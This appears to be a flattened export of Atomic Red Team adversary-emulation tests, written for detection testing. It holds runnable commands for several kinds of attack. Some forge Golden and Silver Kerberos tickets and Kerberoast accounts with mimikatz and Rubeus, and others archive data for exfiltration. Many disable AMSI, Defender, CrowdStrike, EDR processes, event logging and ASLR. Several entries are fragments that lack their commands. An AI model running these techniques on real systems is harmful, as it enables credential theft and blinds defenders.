  klist purge
  cd %temp%
  "$Env:temp\rubeus.exe" ptt /ticket:kirbifile
  echo.
  echo Requesting SYSVOL:
  dir \\$($ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain")\SYSVOL
  echo.
  echo Tickets after requesting SYSVOL:
  klist
  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { if ($_ -match 'End of Golden Ticket attack') { break } }
} while ($false) # dummy loop so that 'break' can be used
# show output from new empty session
Get-Content $env:TEMP\golden.txt
Description: Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
# get current domain SID if default was used
$domain_sid = "S-1-5-21-DEFAULT"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to silver.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\silver.txt 2>&1 (
  echo Purge existing tickets and create silver ticket:
  klist purge
  ..\ExternalPayloads\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:silverticketfakeuser /service:HOST /target:%logonserver:\\=%.%userdnsdomain% /ptt" "exit"
  echo.
  echo Tickets after requesting schtasks:
  klist
  echo.
  echo End of Silver Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null
# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\silver.txt" -Wait | ForEach-Object { if ($_ -match 'End of Silver Ticket attack') { break } }
} while ($false) # dummy loop so that 'break' can be used
# show output from new empty session
Get-Content $env:TEMP\silver.txt
Description: Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets.
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
Prereq: Mimikatz executor must exist on disk and at specified location (..\ExternalPayloads\mimikatz\x64\mimikatz.exe)
Description: This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source](https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
When executed successfully, the test displays available services with their hashes.
If the testing domain doesn't have any service principal name configured, there is no output.
Description: Information on the Rubeus tool and its creators can be found here: https://github.com/GhostPack/Rubeus#asreproast
This build targets .NET 4.5. If targeting a different version, you will need to compile Rubeus yourself.
T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
Extract all accounts in use as SPN using setspn
setspn -T %USERDNSDOMAIN% -Q */*
Description: The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output all the SPNs for the related domain.
Description: The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output the SPNs for the endpoint in question.
Description: The following test will utilize native PowerShell Identity modules to query the domain to extract all the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output the SPNs for the domain in question.
Description: Information on the Rubeus tool and its creators can be found here: https://github.com/GhostPack/Rubeus#asreproast
This build targets .NET 4.5. If targeting a different version, you will need to compile Rubeus yourself.
Description: Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
T1558.004 - Steal or Forge Kerberos Tickets: AS-REP Roasting
WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
Description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Execute Commands
{MISSING IN ATOMIC RED TEAM}
Description: Executes commands via DDE using Microsoft Word
T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Execute PowerShell script via Word DDE
start "$T1559.002\bin\DDE_Document.docx"
Description: When the Word document opens it will prompt the user to click OK on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a PowerShell script
T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Description: Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data for Exfiltration With Rar
"%programfiles%/WinRAR/Rar.exe" a -r %USERPROFILE%\T1560.001-data.rar %USERPROFILE%\*.txt
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.
When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory.
Prereq: Rar tool must be installed at specified location (%programfiles%/WinRAR/Rar.exe)
if not exist "%programfiles%/WinRAR/Rar.exe" (exit /b 1)
Cleanup:
del /f /q /s %USERPROFILE%\T1560.001-data.rar >nul 2>&1
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data and lock with password for Exfiltration with winrar
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
"%programfiles%/WinRAR/Rar.exe" a -hp"blue" hello.rar
dir
Description: Note: Requires WinRAR installation.
rar a -p"blue" hello.rar (VARIANT)
Prereq: Rar tool must be installed at specified location (%programfiles%/WinRAR/Rar.exe)
if not exist "%programfiles%/WinRAR/Rar.exe" (exit /b 1)
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data and lock with password for Exfiltration with winzip
path=%path%;"C:\Program Files (x86)\winzip"
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
"%ProgramFiles%\WinZip\winzip64.exe" -min -a -s"hello" archive.zip *
dir
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data and lock with password for Exfiltration with 7zip
mkdir $T1560.001\victim-files
cd $T1560.001\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
"%ProgramFiles%\7-zip\7z.exe" u archive.7z *txt -pblue
dir
Description: Note: This test requires 7zip installation.
Prereq: 7zip tool must be installed at specified location (%ProgramFiles%\7-zip\7z.exe)
if not exist "%ProgramFiles%\7-zip\7z.exe" (exit /b 1)
Cleanup:
rmdir /s /Q $T1560.001\victim-files >nul 2>&1
T1560.001 - Archive Collected Data: Archive via Utility
Data Compressed - nix - zip
zip $HOME/data.zip /var/log/{w,b}tmp
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
Prereq: Files to zip must exist (/var/log/{w,b}tmp)
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
Cleanup:
rm -f $HOME/victim-gzip.txt.gz
T1560.001 - Archive Collected Data: Archive via Utility
Data Compressed - nix - tar Folder or File
tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
Prereq: Folder to zip must exist ($HOME/$USERNAME)
test -e $HOME/$USERNAME
Cleanup:
rm -f $HOME/data.tar.gz
T1560.001 - Archive Collected Data: Archive via Utility
Data Encrypted with zip and gpg symmetric
mkdir -p /tmp/T1560
cd /tmp/T1560; touch a b c d e f g
zip --password "InsertPasswordHere" /tmp/T1560/T1560 ./*
echo "InsertPasswordHere" | gpg --batch --yes --passphrase-fd 0 --output /tmp/T1560/T1560.zip.gpg -c /tmp/T1560/T1560.zip
ls -l /tmp/T1560
Description: Encrypt data for exfiltration
Prereq: gpg and zip are required to run the test.
if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
Cleanup:
rm -Rf /tmp/T1560
T1560.001 - Archive Collected Data: Archive via Utility
Description: An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding.
This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server.
In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data.
https://attack.mitre.org/versions/v7/software/S0267/
Prereq: The folder and test files must exist
if [ ! -d /tmp/t1560 ]; then exit 1; else exit 0; fi;
Cleanup:
rm -rf /tmp/t1560
T1560.001 - Archive Collected Data: Archive via Utility
ESXi - Remove Syslog remote IP
# Extract line with IP address from the syslog configuration output
..\ExternalPayloads\plink.exe -ssh atomic.local -l root -pw n/a -m ..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
# Replace the IP with "0"
..\ExternalPayloads\plink.exe -ssh atomic.local -l root -pw n/a -m ..\atomics\T1560.001\src\esxi_remove_loghost.txt
# Extract the IP from the line extracted from findstr
$inputFilePath = "c:\temp\loghost.txt"
$outputFilePath = "c:\temp\loghost_ip.txt"
if ([string]::IsNullOrWhiteSpace($fileContent)) {
    Write-Host "The content is $fileContent"
    Write-Host "The file is empty"
} else {
    # Use a regular expression to extract IP addresses
    $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
    $output = "esxcli system syslog config set --loghost=" + $ipAddresses
    Write-Host "IP addresses extracted and saved to $outputFilePath"
}
Description: An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
Prereq: The plink executable must be found in the ExternalPayloads folder.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Cleanup:
# Re-add the initially extracted IP
..\ExternalPayloads\plink.exe -ssh atomic.local -l root -pw n/a -m c:\temp\loghost_ip.txt
rm c:\temp\loghost_ip.txt
rm c:\temp\loghost.txt
T1560.001 - Archive Collected Data: Archive via Utility
Compress a File for Exfiltration using Makecab
makecab.exe C:\Temp\sam.hiv C:\Temp\art.zip
Description: An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
[reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
Prereq: A sample file for compression must be located at specified location (C:\Temp\sam.hiv)
if not exist "C:\Temp\sam.hiv" (exit /b 1)
Cleanup:
del C:\Temp\art.zip
T1560.001 - Archive Collected Data: Archive via Utility
Description: Uses tarfile from Python to compress files
Prereq: Requires Python
which python || which python3
Cleanup:
rm /tmp/passwd.tar.gz
T1560 - Archive Collected Data
Compress Data for Exfiltration With PowerShell
dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\T1560-data-ps.zip
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.
When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory.
T1562.001 - Impair Defenses: Disable or Modify Tools
Unload Sysmon Filter Driver
fltmc.exe unload SysmonDrv
Description: Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
run the prereq_commands; they should fail with the error "sysmon filter must be loaded".
Description: An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Description: With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
Description: With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon execution, information will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
Description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP. Upon execution, Virus and Threat Protection will show as disabled
in Windows settings.
Description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action, so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
Description: Disable Windows Defender from starting after a reboot. Upon execution, if the computer is rebooted, the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
Description: Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Description: Removing definition files would cause ATP to not fire for AntiMalware. Check the MpCmdRun.exe man page for info on all arguments.
On later versions of Windows (1909+) this command fails even with admin due to insufficient privileges. On older versions of Windows the
command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
T1562.001 - Impair Defenses: Disable or Modify Tools
Stop and Remove Arbitrary Security Windows Service
Description: Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Uninstall CrowdStrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random GUID, we need to identify it before invoking the uninstaller.
T1562.001 - Impair Defenses: Disable or Modify Tools
Tamper with Windows Defender Evade Scanning - Folder
Description: Malware can exclude a specific path from being scanned, evading detection.
Upon successful execution, the path provided should be on the list of excluded paths.
To check the exclusion list using PowerShell: (Get-MpPreference).ExclusionPath
Description: Malware can exclude specific extensions from being scanned, evading detection.
Upon successful execution, the extension(s) should be on the list of excluded extensions.
To check the exclusion list using PowerShell: (Get-MpPreference).ExclusionExtension
Description: Malware can exclude specific processes from being scanned, evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes.
To check the exclusion list using PowerShell: (Get-MpPreference).ExclusionProcess
Description: The following Atomic will attempt to disable Windows Defender using the built-in DISM.exe (Deployment Image Servicing and Management tool).
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution writes no details to standard output. Remove the quiet switch if verbosity is needed.
This method will remove Defender and its package.
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
Prereq: Advancedrun.exe must exist at ..\ExternalPayloads\AdvancedRun.exe
Description: Backstab loads the Process Explorer driver, which is signed by Microsoft, and uses it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which are otherwise not possible to kill.
https://github.com/Yaxser/Backstab
Prereq: Backstab64.exe should exist in the ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP using Set-MpPreference aliases. Upon execution, Virus and Threat Protection will show as disabled
in Windows settings.
Description: The following Atomic will attempt to disable Windows Defender using the built-in PowerShell cmdlet Disable-WindowsOptionalFeature from the Deployment Image Servicing and Management (DISM) module.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution writes no details to standard output. Remove the quiet switch if verbosity is needed.
This method will remove Defender and its packages.
Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
T1562.001 - Impair Defenses: Disable or Modify Tools
WMIC Tamper with Windows Defender Evade Scanning Folder
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
Description: The following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Cleanup:
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: The following atomic test will delete the Windows Defender scheduled tasks.
[Reference](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)
Prereq: The Windows Defender scheduled tasks must be backed up first
T1562.001 - Impair Defenses: Disable or Modify Tools
Clear History
history -c
Description: Clear shell history. This technique only affects the bash shell.
T1562.001 - Impair Defenses: Disable or Modify Tools
Suspend History
set +o history
Description: Suspend shell history, as seen in the AwfulShred wiper. Reference: https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
Cleanup:
set -o history
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Clear the paging cache via the system request interface. This is a temporary change to the system that drops the page cache. This technique was seen in the AwfulShred wiper as part
of its malicious payload on the compromised host. Reference for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
T1562.001 - Impair Defenses: Disable or Modify Tools
Disable Memory Swap
swapon -a
sleep 2
swapoff -a
sync
Description: Disable swap devices, which impairs the compromised host's ability to swap data to disk when RAM is full. The AwfulShred wiper used this technique as an additional
payload on the compromised host, to make sure that no recoverable data is left behind by the swap feature of FreeBSD/Linux.
Cleanup:
swapon -a
sleep 2
sync
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
The pre-req needs to be run in order to set up HVCI and have it enabled.
We do not recommend running this in production.
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
Description: With administrative rights, an adversary can disable AMSI via a registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and pointing it to a DLL that does not exist.
This is currently being used by AsyncRAT and others.
https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html
https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
Description: With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
Description: An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
Prereq: Check if VMWARE PowerCLI PowerShell Module is installed.
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
Description: This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or Intune. This test simulates an Intune-based rules deployment.
T1562.001 - Impair Defenses: Disable or Modify Tools
$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
$newValueData = "1"
New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
Write-Host "Registry value created: $newValueName with data $newValueData"
Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
Description: This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or Intune. This test simulates a GPO-based rules deployment.
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: A threat actor could disable the AMSI function by adding a registry value named "AmsiEnable" under the registry key "HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable" and setting its value to 0.
Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
Description: This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectively disable the Event Log application channel. The changes only take effect after a restart.
Description: This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectively disable the Event Log application channel. The changes only take effect after a restart.
Description: This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectively remove that provider from the session and cause it not to emit any logs of that type. The changes only take effect after a restart.
Description: This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectively remove that provider from the session and cause it not to emit any logs of that type. The changes only take effect after a restart.
T1562.001 - Impair Defenses: Disable or Modify Tools
Freeze PPL-protected process with EDR-Freeze
# Enable SeDebugPrivilege
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class TokenAdjuster {
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
# Get the folder of the current script
$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
# Download latest EDR-Freeze package and extract (force replace)
$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
try {
    Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
    Write-Host "Download completed: $zipPath" -ForegroundColor Green
    $extractFolder = $scriptFolder
    if (Test-Path $zipPath) {
        Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
        if (Test-Path $extractFolder) {
            # Ensure target exe not locked; attempt to stop any running instance silently
            Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
        }
        Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
        # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
        $archive = $null
        try {
            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
            foreach ($entry in $archive.Entries) {
                if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
                if ($entry.FullName.EndsWith('/')) {
                    # directory entry
                    $dirPath = Join-Path $extractFolder $entry.FullName
                    if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
                    continue
                }
                $destPath = Join-Path $extractFolder $entry.FullName
                $destDir = Split-Path $destPath -Parent
                if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
                if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
                try {
                    # Use static extension method (PowerShell 5.1 compatible)
                    [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
                } catch {
                    Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
                }
            }
            Write-Host "Extraction completed." -ForegroundColor Green
        } finally {
            if ($archive) { $archive.Dispose() }
        }
    }
} catch {
    Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
}
# Wait 15s before putting the targeted process in the coma
Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 3
Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 2
# Put the targeted process in the coma for 15s
# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue | Sort-Object LastWriteTime -Descending | Select-Object -First 1 -ExpandProperty Name
if (-not $edrFreezeExeName) {
    Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
    exit 1
}
$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
Description: This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
T1562.001 - Impair Defenses: Disable or Modify Tools
Disable ASLR Via sysctl parameters - Linux
sysctl -w kernel.randomize_va_space=0
Description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
Cleanup:
sysctl -w kernel.randomize_va_space=2
T1562.002 - Impair Defenses: Disable Windows Event Logging
Disable Windows IIS HTTP Logging
C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:true
Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
Cleanup:
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:false *>$null }
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
Cleanup:
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:false *>$null }
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description: Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
Cleanup:
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description: Disables the Windows audit policy to prevent key host-based telemetry from being written into the event logs.
[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
T1562.002 - Impair Defenses: Disable Windows Event Logging
Clear Windows Audit Policy Config
auditpol /clear /y
auditpol /remove /allusers
Description: Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
Description: This test simulates an adversary modifying access permissions for a Windows Event Log channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the Event Viewer or via utilities such as "Get-EventLog" or "wevtutil".
Description: This test simulates an adversary modifying access permissions for a Windows Event Log channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the Event Viewer or via utilities such as "Get-EventLog" or "wevtutil".
